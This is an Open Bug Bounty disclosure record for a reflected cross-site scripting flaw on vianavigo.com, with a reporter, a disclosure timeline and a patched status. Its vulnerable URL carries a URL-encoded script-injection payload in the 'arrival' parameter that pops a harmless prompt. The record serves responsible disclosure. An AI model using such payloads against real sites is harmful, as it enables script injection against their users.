vianavigo.com XSS vulnerability

2017-07-06T17:42:00
ID OBB:260806
Type openbugbounty
Reporter sifflaern
Modified 2017-08-06T08:29:00

Description

Vulnerable URL:
http://www.vianavigo.com/fr/itineraire-plan-de-quartier/?mrq=c21cbe364dee5c9dc32904d1ff5a6165265&dateFormat=dd%2FMM%2Fyyyy&departure=b&departureCity=&departureType=&arrival=%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%28%2FOPENBUGBOUNTY%2F%29%3C%2Fscript%3E&arrivalCity=&arrivalType=&date=06%2F07%2F2017&sens=1&hour=19&min=33&spcar=%C3%A2&hpx=1&hat=1&L=0&submitSearchItinerary=
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 61663
VIP website status:| Yes
Check vianavigo.com SSL connection:| (Grade: B+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 July, 2017 17:42 GMT
Generic security notifications sent to website owner| 6 July, 2017 17:45 GMT
Notification sent to subscribers (without technical details)| 6 July, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 5 August, 2017 18:15 GMT
Vulnerability patched by the website owner| 6 August, 2017 08:29 GMT